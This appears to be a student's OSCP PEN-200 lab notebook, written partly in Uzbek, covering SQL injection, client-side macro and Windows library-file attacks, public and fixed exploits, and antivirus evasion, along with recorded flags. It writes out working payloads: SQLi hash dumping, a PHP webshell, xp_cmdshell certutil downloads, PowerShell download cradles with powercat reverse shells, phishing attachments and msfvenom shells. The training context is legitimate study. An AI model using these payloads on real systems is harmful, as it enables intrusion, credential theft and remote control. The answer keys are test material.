1) Visit the website and add alvida-eatery.org to your hosts file.
2) Analyze the site with tools like Wappalyzer or WhatWeb to identify the CMS (WordPress).
3) Use WPScan to enumerate plugins/themes, searching for known vulnerabilities.
4) Use the POC in
https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad/
5) By searching wordpress keywords in
https://hashcat.net/wiki/doku.php?id=example_hashes
, we will notice that wordpress hashes start with $P$ characters. You should take it into account when you are
receiving the output.
Command
nano /etc/hosts ga IP va alvida-eatery.org ni qo’shdim
http://example.com/wp-admin/admin-ajax.php?
action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2
OSCP PEN-200 67
ni ishlatdim
curl "http://alvida-eatery.org/wp-admin/admin-ajax.php?action=get_question&question_id=1 union select 1%2C1%
hash langan qiymat topdim uni faylga saqlab
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass hashes
shu orqali parolni topdim
wp ga kirib zip langan wp uchun reverse shell beruvchi zip ni pluginga upload qildim
va flag topdim
5. Capstone Lab: Enumerate the Module Exercise - VM #2 and
exploit the SQLi vulnerability to get the flag.
Answer
OS{6c96c9e9dfcbf860b9427b3695eed2f2}
View hints
1. Capture the request of subscribing newsletter with Burp and test the parameter for sqli vulnerability with a
single quote (').
2. Use an ORDER BY query to determine the number of columns in the vulnerable parameter.
3. To find the correct column, you can test the "@@version" payload for each column to check if you are retrieving
the database version.
4. Inject a simple php webshell payload using a "union select" query and "into outfile" write the webshell to the
/var/www/html directory.
5. Access the webshell for RCE and execute commands on the server.
Command
ip ga request jonattim, index.php ochildi, wepsite dan input qabul qiladigan joydan input kiritib burpdan analyse
qildim
OSCP PEN-200 68
' union select null,null,null,null,'<?php system($_GET["cmd"]); ?>',null into outfile '/var/www/html/rce.php'#
shu ni URL encode qilib [email protected] deb ketidan command execute qildim
rce.php accept bo’lganidan keyin index.php ni o’rniga rce.php ga kirib command execute qildim
OSCP PEN-200 69
6. Capstone Lab: Enumerate the Module Exercise - VM #3 and
exploit the SQLi vulnerability to get the flag.
Answer
OS{8ef8fc4e05a438792174c2db57dd0985}
View hints
1) Test for SQL injection by adding a single quote (') to each input parameter and check for errors.
2) Based on the error received, check which DBMS you are facing.
3) Based on the target DBMS, try to get a code execution.
4) Code execution on PostgreSQL DBMS is slightly different than MSSQL or Mysql DBMSes. Copy statement should
OSCP PEN-200 70
be used.
5) Check out CVE-2019-9193:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#
command-execution
Command
height ga sql injection qilamiz
' ; DROP TABLE IF EXISTS commandexec; CREATE TABLE commandexec(data text); COPY commandexec FROM P
shu commandni URL encoding qilamiz va heightga tashimz
sent qilishdan oldin terminalda netcat listen qb qoyamz
burpdan sent qilamiz
OSCP PEN-200 71
7. Capstone Lab: Enumerate the Module Exercise - VM #4 and
exploit the SQLi vulnerability to get the flag.
Answer
OS{d3cf4fb610ba80eefe0483e2d428351c}
View hints
1. Test username or password fields with a single quote(').
2. Use time-based payloads to identify the DB.
3. Once the db is known, look for specific vulnerabilities to gain further access.
4. For MSSQL, enable xp_cmdshell including advanced options.
Command
ip ga request jonatamiz va login joyiga burpdan input kiritib headerlarini ko’ramiz
shu yerga sql injection qilamiz
You'll need to send the following payloads in 4 requests using Burp Repeater. Remember to use URL-Encoding.
';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure "xp_cmdshell", 1;--
';RECONFIGURE;--
After enabling xp_cmdshell, we will transfer nc64.exe binary to the target.
Start python server on attacker machine
┌──(root ㉿kali)-[~]
└─$ python3 -m http.server 80
=> In burpsuite username parameter
';EXEC xp_cmdshell "certutil -urlcache -fhttp://192.168.45.191/nc64.exe c:/windows/temp/nc64.exe";--
OSCP PEN-200 72
then you need to start a listener and trigger nc64.exe
';EXECUTE sp_configure "show advanced options", 1;RECONFIGURE;EXECUTE sp_configure "xp_cmdshell", 1;REC
nc64.exe dasturini download qilib ayni u yerda terminalimizda server host qilamiz
python3 -m http.server 80
UsernameTextBox ga
';EXEC xp_cmdshell "certutil -urlcache -f http://192.168.45.191/nc.exe c:/windows/temp/nc.exe";--
ni execute qilamiz va bizdan nc64.exe dasturini c:/windows/temp/nc64.exe ga tashlaydi va netcat ishga tushirib
listening qilamiz
nc -nvlp 4444
va burpsuitedan UsernameTextBox ga shu executionni amalga oshiramiz
';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE
va bizga reverse shell ochiladi
man flagni shu hintga asosan flagni topdm
OSCP PEN-200 73
11. Client-side Attacks
11.1.1. Information Gathering
client-side Attacks - Information Gathering - VM #1
client-side Attacks - Information Gathering - VM #2
Labs
1. Download
old.pdf from the Mountain Vegetables website on VM #1 by clicking on the OLD button. Use exiftool to review the file's
metadata. Enter the value of the Author tag.
Answer
OS{6cef223ba566a9d5d3e39d6f871bd2e8}
View hints
Make sure that you are using wget to download the PDF instead of using the browser's 'print and save to PDF'
option.
Command
ip bo’yicha kiramiz old.pdf file ni download qilamiz
OSCP PEN-200 74
exiftool -a -u old.pdf
shu command orqali flag topamiz
2. Start VM #2 and use gobuster to bruteforce the contents of the web server. Specify "pdf" as the filetype and find a
document other than old.pdf and brochure.pdf. After you identify the file, download it and extract the flag in the
metadata.
Answer
OS{75e42fa30db205cc3c0daed5b5a7eda4}
View hints
1. Consider using the /usr/share/wordlists/dirb/common.txt wordlist.
2. Use the -x parameter in the gobuster command to specify the filetype as PDF.
Command
ip ga bruteforce qilamiz gobuster yordamida pdf fayllarni exiftool yordamida detaillarini ko’ramiz
gobuster dir -u 192.168.158.197 -w /usr/share/wordlists/dirb/common.txt -x pdf -t 100
exiftool -a -u info.pdf
OSCP PEN-200 75
11.1.2. Client Fingerprinting
Labs
1. Reproduce the steps from this section by opening the link yourself.
Open the link one time with an enabled AdBlocker and one time with a
disabled AdBlocker. Answer true or false: There is no difference in the
results regarding enabled or disabled AdBlocker.
Answer
false
View hints
no hints
Command
no commands
11.2.1. Preparing the Attack
Labs
1. Answer with true or false: MOTW is not added to files on FAT32-formatted devices.
Answer
true
View hints
no hints
Command
no commands
2. Answer with true or false: After the announced Microsoft change
regarding the default macro behavior in Office installations, users will
still be able to execute macros with the click of a single button.
Answer
false
View hints
no hints
Command
no commands
3. Answer with true or false: Is it possible to avoid getting a file
flagged with MOTW by providing it in container file formats like 7zip,
ISO, or IMG? Research if threat actors use these formats to deliver
their malware and answer accordingly.
Answer
true
View hints
no hints
Command
OSCP PEN-200 76
no commands
11.2.2. Installing Microsoft Office
client-side-Attacks - Installing Microsoft Office - VM #1
Labs
1. Check which programs Microsoft Office 2019 has installed and
complete the following list: Word, PowerPoint, Outlook, Publisher,
Access, Excel, and __________.
Answer
OneNote
View hints
1. Click on the Windows icon on the taskbar and click More just right after recommended.
2. What you're looking for is a program related to taking notes.
Command
no commands
11.2.3. Leveraging Microsoft Word Macros
Client-side Attacks - Leveraging Microsoft Word Macros - VM Group 1
Labs
1. Perform the steps from this section to create a malicious Word document containing a macro with the name
MyMacro on the OFFICE (VM #1) machine. For this, you have to install Microsoft Office on VM #1 again as outlined in
the section "Installing Microsoft Office".
Confirm that the macro works as expected by obtaining a reverse shell from the
OFFICE machine. What keyword is used to declare a variable in VBA?
Answer
Dim
View hints
1. Watch the video for this learning unit if you encounter difficulties replicating the steps.
2. In VBA, use the keyword for declaring variables.
3. Review the paragraph above listing 5 and the code in listing 5.
Command
2. Once you have confirmed that the macro from the previous exercise works, upload the document containing the
macro MyMacro in the file upload form (port 8000) of the TICKETS (VM #2) machine with the name ticket.doc. A script
on the machine, simulating a user, checks for this file and executes it. After receiving a reverse shell, enter the flag from
the flag.txt file on the desktop for the Administrator user. For the file upload functionality, add tickets.com with the
corresponding IP address in /etc/hosts. Please note that it can take up to three minutes after uploading the document
for the macro to get executed.
Answer
OS{01fe98f62caaec1e93813a3e63c0c9a9}
View hints
1. Store the macro as shown in Figure 21.
OSCP PEN-200 77
2. Encode the payload in base64 using UTF-16LE, as shown Listing 32: Common Web Application Attacks :: Using
Executable Files.
3. Ensure proper splitting of the encoded string in split.py and no new lines in the file.
4. Use the impacket-smbserver tool to transfer the file to your Kali machine once you've created the malicious
Word file.
5. If you can't access tickets.com after modifying the /etc/hosts file, try accessing the website from the exercise
machine after modifying c:\Windows\System32\Drivers\etc\hosts.
Command
oldingi VM dan foydalangan holda C: ichidagi microsoft office o’rnatamiz, word file yaratamiz, uni formatini
ticket.doc deb saqlaymiz, va ichiga kirib makros yaratamiz, macro ismini MyMacro deb yozib edit qilamiz
shu code ni UTF-16LE shaklida base64 da encode qilamiz
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.16
8.119.2 -p 4444 -e powershell
shu encode qilingan datani python code orqali qator qator chiqaradigan scriptga joylab ishlatamiz undan chiqqan
outputni macrosni yuklaymiz ichiga
str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."
n = 50
for i in range(0, len(str), n):
print("Str = Str + " + '"' + str[i:i+n] + '"')
OSCP PEN-200 78
cmd.exe ni ochib c:/windows/system32/drivers/etc/hosts ga ip va domen yozamiz
va browserdan ip:8000 ga kirib shu ticket.doc fileni yuklashdan oldin o’zimizni pc dan nc va /usr/share/powershell-
empire/empire/server/data/module_source/management ni ichida httpserver yoqamiz powercat.ps1 fileni olishi
OSCP PEN-200 79
uchun
va yuklab kutamiz reverse shell olganimizdan keyin flagni topamiz
11.3.1. Obtaining Code Execution via Windows Library Files
Client-side Attacks - Abusing Windows Library Files - VM Group 1
Client-side Attacks - Abusing Windows Library Files - VM Group 2
Labs
1. Follow the steps in this section to get code execution on the
HR137 (VM Group 1 - VM #2) system by using library and shortcut files. Be aware that after every execution of a .lnk file
from the WebDAV share, the library file from the SMB share will be removed. You can find the flag on the desktop of the
hsmith user. You can use VM #1 of VM Group 1 to build the library file and shortcut.
Answer
OS{72550776f213b44bb41ad8900706354d}
View hints
no hints
Command
web server qilib beruvchi packet download qilib olamiz
pip3 install wsgidav
web server uchun dir yaratib shuni ichida ishga tushuramiz
mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
bizga amaliy config file larni yaratb olish uchun ajratilgan vmdan configlani vscode da yaratamiz
OSCP PEN-200 80
birinchi fileni ismini config.Library-ms deb qoyamiz
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.119.2</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
ikkinchi fileni link shaklda powershell script yozib tashlaymiz
bu fileni ismini automatic_configuration deb qo’yamiz
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powerca
t.ps1');
powercat -c 192.168.119.3 -p 4444 -e powershell"
wsgidav ni 80 portda ishga tushuramiz, python http serverni 8000 portda ishga tushuramiz, nc yordamida 4444 ni
listen qilamiz
smbclient //192.168.50.195/share -c 'put config.Library-ms'
yordamida config filemizni smb orqali jo’natamiz va bizga reverse shell ochiladi
2. Answer the following question with true or false: Is the .lnk file tagged with the "Mark of the Web" when you execute
it in Explorer by double-clicking the Windows library file?
Answer
true
View hints
OSCP PEN-200 81
no hints
Command
no commands
3. Capstone Lab: Enumerate the ADMIN (VM
Group 2 - VM #4) machine and find a way to leverage Windows library and
shortcut files to get code execution. Obtain a reverse shell and find
the flag on the desktop for the
Administrator user. You can use VM #3 of VM Group 2 to prepare your attack.
Answer
OS{07b19cd103dcbb9ce224273f2fd05c60}
View hints
1. Scan the ports with nmap.
2. Start by fuzzing the webserver for some hidden files (pdf,txt) using gobuster or ffuf.
3. Download any files you have found directly with tools like wget for futre anaylsis such as the creator of the file.
4. Use the commands provided in Listing 11 to host any malicious file and send the email.
5. Make sure you mount the correct path where you have the Webdav folder! Is it root/webdav or
/home/kali/webdav?
6. Do not limit yourself with only tool and search for other powershell reverse shells.
Command
Dear learners,
I'm sharing some insights on Learning Module 11.3.1 Capstone labs
STEP I - Preparing the 2 files for the attack on WinPrep
NOTE : Don’t start yet the wsgidav server , that way you DON’T open the config-Library.ms by accident in your WinPrep
machine (when you open it will change the meta in the file cause it connects to the wsgidav server)
1. Connect to RDP on WinPrep and you will share your TMP folder with the machine (that way you copy-paste the
2 files we will create - config.Library-ms and automatic_configuration.lnk )
xfreerdp /u:offsec /p:lab /v:192.168.X.194 /drive:/tmp
1. Open VS-Code and create an empty text file on the desktop and name it config.Library-ms , close VS-Code (wait for
the file to appear, it looks like in the video a folder with a blank file behind it)
2. Right-click -> Open with -> VS-Code. Now copy Listing 17 - Windows Library code for connecting to our
WebDAV Share (change the IP with your tun0) then save the file and exit VS-Code (now in 1-2 seconds ICON
should change to a blue one, meaning all went good so far!)
*NOTE: **DON’T double click the new file, else inside it will change, like leave it like that!
1. Now it's time to create the Shortcut: Right-Click on Desktop -> New -> Shortcut. On the type of location you
copy paste FULL command from Listing 18 - PowerShell Download Cradle and PowerCat Reverse Shell
Execution (make sure to change both IPs with your tun0 IP)
NOTE: When you copy-paste Listing 18 it will not take full one-liner, but only first command, so make sure you insert
both commands (else will stop at “;” which ends the 1st command)
1. Copy-paste to your shared TMP: File Explorer -> This PC -> _tmp on Kali.
Now both files are transferred with integrity on your own Kali. Move them to
/home/kali/webdav from /tmp
(on your Kali)
OSCP PEN-200 82
cd /home/kali/webdavcp /tmp/automatic_configuration.lnk .cp /tmp/config.Library-ms .
*STEP II - Wsgidav + Python3 HTTP Server + Swaks attack **
Capstones are meant to be done after you are done with the training material and you bounce back to sharpen
your skills with this type of exercise called capstones!
Swaks is learned in module 24, so if you want to do the capstone observe carefully the videos regarding Swaks
- 25.3.2. Phishing for Access *
Follow the exact steps as Kali user (not root) to install wsgidav
1. After you create the webdav folder at /home/kali/webdav and copy-pasted both files in the same folder like I showed
upper, make sure you add **powercat.ps1 **there, including a new file named body.txt (content can be
anything)
**NOTE: **You should have by now 4 files there :
automatic_configuration.lnk , config.Library-ms , powercat.ps1 and body.txt
2. Make sure to open `wsgidav sharing the webdav folder where you have the files
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
NOTE: Do a test on your Kali Browser and go to http://tun0_IP ! If you see the wsgidav server you are good until
here!
1. In the same folder webdav , open Python3 HTTP Server (to be safer I usually recommend opening the folder, right-
click on it, and open terminal )
python3 -m http.server 8000
NOTE: Wsgidav is hosted on port 80 and Python3 HTTP Server is opened on port 8000!
1. Swaks attack (as shown in 25.3.2 Pishing for Access)
sudo swaks -t [email protected] -t [email protected] --from [email protected] --attach @config.Library-m
Do the command in the same folder where you have all 4 files, meaning in this location -> /home/kali/webdav
(else it fails to attach config.Library-ms and body.txt when you execute it!)
12. Locating Public Exploits
12.1.1. A Word of Caution
Labs
1. True/False: It is important to read the code of an exploit before
executing it.
Answer
true
View hints
no hints
Command
no commands
OSCP PEN-200 83
2. What is a way to safely test an exploit? (Enter the letter
corresponding with the answer)
A. Execute the exploit on our Kali host during an engagement
B. Execute the exploit on a target host in the penetration test engagement
C. Execute the exploit in a controlled virtual machine environment to
observe its behavior
D. Distribute the exploit and ask for feedback
Answer
View hints
no hints
Command
no commands
12.2.1. The Exploit Database
Labs
1. True/False: Exploit DB is free to access and use.
Answer
true
View hints
no hints
Command
no commands
2. Which field designates the type of system the exploit impacts?
Answer
Platform
View hints
no hints
Command
no commands
3. Which of the following is not a valid exploit type? (Enter the
letter corresponding with the answer)
A. dos
B. local
C. remote
D. compiled
E. webapp
Answer
View hints
no hints
Command
no commands
4. Who are the authors of the exploit with the EDB-ID of 35273? (Keep
the same format as listed on Exploit DB)
OSCP PEN-200 84
Answer
ryujin & sickness
View hints
no hints
Command
no commands
5. True/False: The EDB Verified checkmark means that a trusted
individual reviewed, executed, and determined that the exploit works.
Answer
true
View hints
no hints
Command
no commands
12.3.1. Exploit Frameworks
Labs
1. True/False: There is a free version of Metasploit available for
public use.
Answer
true
View hints
no hints
Command
no commands
2. What company made Canvas?
Answer
Immunity
View hints
no hints
Command
no commands
12.3.2. SearchSploit
Labs
1. What package must be installed to use searchsploit and have an
updated copy of the Exploit Database?
Answer
exploitdb
View hints
no hints
OSCP PEN-200 85
Command
no commands
2. What is the searchsploit command to search for the following terms:
php, webdav, windows? (Enter the full command with the search terms in
order)
Answer
searchsploit php webdav windows
View hints
no hints
Command
no commands
3. What searchsploit option allows us to copy a found exploit to the
current working directory?
Answer
-m
View hints
no hints
Command
no commands
4. Using searchsploit, find the EDB-ID of the exploit with the title
of "Arm Whois 3.11 - Buffer Overflow (SEH)".
Answer
45796
View hints
no hints
Command
no commands
5. Copy the exploit with the EDB-ID of 45796. What is the affected
software version? (Provide only the numbers)
Answer
3.11
View hints
no hints
Command
no commands
6. What is the EDB-ID of the Eternal Blue exploit that targets Windows 2012 x64?
Answer
42030
View hints
no hints
Command
OSCP PEN-200 86
no commands
7. What is the EDB-ID of the privilege escalation exploit against Linux Kernel 2.6.22 using SUID?
Answer
40616
View hints
no hints
Command
no commands
8. What is the EDB-ID of the Linux SquirrelMail Remote Command Execution Metasploit module?
Answer
16888
View hints
no hints
Command
no commands
9. What is the EDB-ID of the HTML Injection exploit for WebCT 4.1.5?
Answer
31337
View hints
no hints
Command
no commands
10. What is the EDB-ID of the Remote Keylogger Bind Shellcode generator for Windows x64?
Answer
45743
View hints
no hints
Command
no commands
12.3.3. Nmap NSE Scripts
Labs
1. True/False: All Nmap NSE scripts are able to execute exploits.
Answer
false
View hints
no hints
Command
no commands
OSCP PEN-200 87
2. What is an easy string to grep for to find which NSE scripts are
exploits?
Answer
exploit
View hints
Just add the grep string, not the full command. NSE scripts that contain exploits will have what string in their name?
Command
no commands
3. On Kali, where are the Nmap NSE scripts located? (Provide the full
default path)
Answer
/usr/share/nmap/scripts
View hints
no hints
Command
no commands
4. What option in nmap can we use get more information about an Nmap
NSE script?
Answer
--script-help
View hints
no hints
Command
no commands
12.4.1. Putting It Together
PublicExploitsWalkthrough
PublicExploits01
PublicExploits02
PublicExploits03
Labs
1. Start and exploit the
PublicExploits01 machine.
Answer
intruder
View hints
Check the downloads folder on the machine and aggregate the information from that with the ports that are open.
1) Scan for SMB services, interact with shares and pay attention to applications you find in the Downloads Folder.
2) Google the name of the application name based on the installer file discovered earlier. When searching for
exploits, keep in mind that the version of the application exploit author used can be older but it doesn't mean new
versions are not vulnerable to that exploit.
3) Use msfvenom to generate a payload such as the following:
OSCP PEN-200 88
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=<PORT> -f exe > reverse.exe
4) If you are unable to get a reverse shell after setting everything up properly, you may want to modify your mtu by
executing the following: sudo ifconfig tun0 mtu 1250. There may be a bit of delay depending on the VPN connection
5) Use python2 instead.
6) If you use
ExploitDB#50972
, python3 should be good.
Command
nmap -sVC -T4 192.168.117.10
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.238 LPORT=5555 -f exe > reverse.exe
python3 -m http.server 80
nc -nlvp 5555
python3 50972.py 192.168.117.10 192.168.45.238 reverse.exe
OSCP PEN-200 89
2. Start and exploit the PublicExploits02 machine.
Answer
intruder
View hints
1. Scan the ports and note the web server version (HTTP).
2. Search for a suitable exploit and make sure you check what arguments the exploit requires.
3. To get more interactive shell, you may use bash reverse shell.
4. The flag is under /home/offsec/ .
Command
nmap -A -T4 192.168.117.188
OSCP PEN-200 90
3. Capstone Lab: An exploitable server is running services on several ports on the exercise VM, PublicExploits03. Treat
this like a real box and start by identifying what services are running. There is a local user student on this box with the
password lab.
Exploit the vulnerable service and SSH to the box to read
flag.txt located in /home/challenge/.
Answer
intruder
View hints
HINT
The ports may need to be modified in the exploit.
HINT
1. Scan all ports and identify services and versions.
2. Find a suitable exploit and understand its requirements.
3. Modify the port in the exploit to match the target.
4. Trigger the exploit by connecting to the SSH with the -p option on the target.
Command
OSCP PEN-200 91
OSCP PEN-200 92
nimagadur mani ip boshqa edi lekin exploitga recieved ip qoyilganida ishladi
13. Fixing Exploits
13.1.3. Cross-Compiling Exploit Code
Fixing Exploits - Changing The Socket Information - Windows Client
Labs
1. Locate the C-written exploit discussed in this section using the
searchsploit tool in Kali Linux. What is the Exploit DB ID related to
the exploit?
Answer
42341
View hints
HINT
1. Searchsploit can be used to search the exploits for "Sync Breeze Enterprise 10.0.28" and look for .c extension.
2. Identify the exploit by noting the name of the C exploit in listing 2, and provide this ID/number as your answer
without extensions.
Command
OSCP PEN-200 93
2. Install the mingw-w64 suite in Kali Linux and compile the exploit
code. What is the parameter used to statically link the local library?
Answer
-l
View hints
HINT
1. Take a closer look at listing 9 where mingw-w64 produces an error-free executable by using the additonal
parameter.
2. In this case, we are adding ws2_32 library with the help of the parameter is being asked here.
Command
3. Start the Windows Client VM and modify the connection information
in the exploit to target the SyncBreeze installation on your
VM. What is the C function that defines an IP address?
Answer
inet_addr
View hints
HINT
1. Consider connecting via RDP and starting the syncbreeze service on the machine.
2. Check listing 10 to find the C function that points to the usage of the IP address.
Command
OSCP PEN-200 94
4. Recompile the exploit and use Wireshark to confirm that the code
successfully initiates a socket connection to your dedicated Windows
client. Run the exploit by issuing the
wine command before the file.
Which C function in the code is used to convert the port number into
network byte order?
Answer
80
View hints
HINT
1. Start the Sync Breeze Enterprise service.
2. Remember to update the IP and Port and recompile the exploit.
3. Which function did you use to update the port? This is also shown in listing 10.
Command
13.1.4. Fixing the Exploit
Labs
1. Replace the return address from the C version of the exploit with
the one present in the Python version and recompile it. In order to
execute the subsequent shellcode that is present on the stack, which
instruction do we normally want to make the return address point to?
Answer
JMP ESP
View hints
HINT
OSCP PEN-200 95
1. Identify the assembly instruction that redirects execution to the stack.
2. The answer is an assembly instruction.
Command
2. Start the target Windows 10 VM and take note of the IP address.
Generate a reverse shell payload using
msfvenom while taking into
account the target IP and the bad characters of our exploit.
Replace the original payload with the newly-generated one, then attach
the debugger to the target process and set a breakpoint at the return
address instruction. Compile the exploit and run it. Verify that you
hit the breakpoint. Which application are we using to run Windows
native binaries on Kali?
Answer
wine
View hints
HINT
1. Generate the payload as shown in listing 13, specifying your LHOST.
2. You may use the Python version of the exploit (42928.py) if you encounter any issues due to ARM64.
3. Review the provided steps in listing 16 to run a Windows binary on Kali.
Command
13.1.5. Changing the Overflow Buffer
Labs
1. Fix the overflow buffer so that the EIP register will be
overwritten by your chosen return address instruction and then start
the Windows Client and get a reverse shell on your local Kali machine.
OSCP PEN-200 96
Which C function is responsible for setting the terminating null-byte
in the exploit?
Answer
memset
View hints
HINT
1. Replicate the steps demonstrated in the learning unit notes and videos.
2. Examine listing 19 more closely.
Command
13.2.2. Selecting the Vulnerability and Fixing the Code
Labs
1. Start the Debian VM, connect to it via SSH, then start the apache2 service. The target
web application is located under
/var/www/https/. Which protocol is
the vulnerable web application running on?
Answer
https
View hints
HINT
Focus on the base URL in listing 26, specifically the protocol.
Command
OSCP PEN-200 97
2. Modify the original exploit and set the base_url variable to the
correct IP address of your Debian VM as well as the protocol to HTTPS.
Which Python method has been used to remove the
admin portion from
the
base_url string?
Answer
split
View hints
HINT
1. Which Python method breaks a string into a list of substrings based on a specified delimiter?
2. Look at listing 31 and the line starting with upload_url.
Command
3. Get familiar with the requests Python library and adjust your
exploit accordingly to avoid SSL verification. Which parameter is
responsible for to skipping TLS/SSL verification in the POST requests?
Answer
verify
View hints
OSCP PEN-200 98
HINT
Check listing 28 to see where it gets "verified." The answer is the "variable" itself.
Command
4. Edit the username and password variables to match the ones from
our test case (username "admin", password "HUYfaw763").
Which variable holds the PHP page responsible for
authentication?
Answer
page
View hints
HINT
1. Which variable is responsible for login?
2. Examine the function "authenticate" in the exploit or in listing 31.
Command
5. Try to run the exploit against the Debian VM. Based on the error
message, which array position is trying to access the
split method
when returning from the
parse_csrf_token function?
Answer
1
View hints
HINT
1. Identify the line and method where the error originates.
2. Look for the array index causing the "IndexError."
OSCP PEN-200 99
Command
13.2.3. Troubleshooting the "index out of range" Error
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
Fixing Exploits - Fixing Web Exploits - Debian VM 1
Fixing Exploits - Fixing Web Exploits - Module Exercise VM #1
Fixing Exploits - Fixing Web Exploits - Module Exercise VM #2
Fixing Exploits - Fixing Web Exploits - Module Exercise VM #3
Labs
1. Observe the error that is generated when running the exploit and troubleshoot the code to determine why the error
occurs. Modify the exploit in order to avoid the error and run it against your dedicated Debian client. Then verify that
your exploit worked by attempting to execute the
whoami command using the remote PHP shell. Finally, attempt to obtain a fully interactive shell with this exploit. Into
which variable is the webshell payload stored?
Answer
payload
View hints
HINT
1. Start apache2 service on Debian VM 1.
2. Use the previous learning unit, listing 31 script, and update the IP.
3. Encode the command used to get the reverse shell.
4. Check the final script for the variable name that helped get the web shell.
Command
2. Capstone Lab: To put in practice what we learned so far, here is the full vulnerable CMS Made Simple. You recovered
the credentials for the admin on this service who is the user offsec with the password
lFEZK1vMpzeyZ71e8kRRqXrFAs9X16iJ. Use this information to exploit the service on VM 1 that is running on
http://[IP_ADDRESS]/cmsms and read /home/flag.txt to solve this challenge.
Answer
OS{8090c08faf3272623a5ed87e355d7427}
View hints
OSCP PEN-200 100
HINT
1. Use the same script that worked previously and make the necessary modifications.
2. Is it http or https?
3. Remember to encode your command and use a proper listening port that isn't firewalled in most cases.
Command
OSCP PEN-200 101
hamma response dagi argumentlarga verify=false ni qo’shib chiqamiz
print "[+] String that is being split: " + location ni parse_csrf_token funksiyasiga qo’shamiz
bizga …admin?_sk_=… qaytadi
OSCP PEN-200 102
demak biz csrf_param variable ("__c") ni _sk_ ga ozgartiramiz
va bizga shell.php yuklab beradi
3. Capstone Lab: The next VM, Module Exercise VM 2, is running a vulnerable version of the elFinder web application
whose exploit is available . Once you've found the application base address through directory brute-forcing, modify the
exploit to point to the correct application URL and get a shell. The flag can be found in the same folder. Note: Before
running the exploit, remember to place a valid JPEG file on your local Kali machine and name it according to the exploit
specifications.
Answer
OS{463e29252cbc18c72ba516dd97427a06}
View hints
HINT
1. Use directory-list-2.3-small.txt wordlist and give it some time.
2. Some fake sample files will be needed for the exploit.
3. Execute the exploit using python2 and provide the found application base address.
Command
OSCP PEN-200 103
exploit ichida SecSignal.jpg bo’lgani uchun
OSCP PEN-200 104
4. Capstone Lab: Enumerate the Module Exercise VM 3 and find
the application that has a memory corruption vulnerability. Then find
the related public exploit and fix it as illustrated in this Module.
Answer
OS{227b2531f8a41e320350e761376a0781}
View hints
HINT
1. Set the correct stageless/staged payload to catch the reverse shell.
2. Don’t remove the NOP sled in the shellcode from the original exploit.
3. There could be various versions of the exploit, but at least one of them should be effective.
Command
bu lab 2 kun vaqtimni ogani uchun hamma skrinshotlar yoq
OSCP PEN-200 105
nmap -sCV -p- ip
20000 portda Easy Chat Server service ni topamiz va bunga exploit qidirb ko’ramiz
Qidiruvlar natijasida 50999.py exploit ni topamiz va bunga o’zgartirishlar kiritb targetni exploit qilamiz
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.195 LPORT=443 -f python -b "\x00\x20" -v sh
NOP ni 16 dan 32 ga o’zgartiramiz
shellcode mizni tashlab, pasidagi headerlardagi ip va portlarni to’g’irlaymiz
exploitimiz tayyor bo’lgach
OSCP PEN-200 106
msfconsole
rasmdagi exploit va payloadlarni va ip va portlarni kiritib run qilamiz
va bizga reverse shell ochiladi
flag esa c:\Users\Administrator\Desktop da joylashgan
OSCP PEN-200 107
14. Antivirus Evasion
14.1.3. Detection Methods
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text
and video.
Antivirus Evasion - AV Components and Operations - VM #1
Labs
1. Which AV engine is responsible for translating machine code into assembly?
Answer
disassembler
View hints
HINT
This component is mentioned in the subchapter "AV Engines and Components"
and it helps to identify any encoding/decoding routine.
Command
2. Which AV detection method makes use of an engine that runs the executable file from inside an emulated sandbox?
OSCP PEN-200 108
Answer
Behavior-Based
View hints
HINT
This detection method analyzes binary file "actions" in a emulated environment such as a small virtual machine.
Command
3. Start up VM #1 and connect via RDP to the Windows 11 machine with the provided credentials. On the user's desktop
you will find a PE file named malware.exe. In order to get the flag, upload the malware sample to
http://www.virustotal.com and once the analysis has completed check the metadata present in the BEHAVIOR tab.
Answer
OS{85189b03c19ff1e2622933a26b151ceb}
View hints
HINT
1. Download malware.exe using the drive capabilities provided by either xfreerdp or rdesktop.
2. Once the file is uploaded, you should find more occurrences of the flag by looking at Behavior > Process and
service actions
Command
OSCP PEN-200 109
14.2.2. In-Memory Evasion
Labs
1. Which on-disk evasion technique makes use of code made by spurious
instructions and that is not part of the main execution?
Answer
Obfuscators
View hints
HINT
1. This technique is mentioned in this module.
2. This technique restructure and alters code to increase its resistance to reverse engineering.
Command
OSCP PEN-200 110
2. When performing Remote Process Injection, which API is responsible
for copying the shellcode into the target thread?
Answer
WriteProcessMemory
View hints
HINT
1. This API function allows a process to "Write" data to the virtual address space of another process.
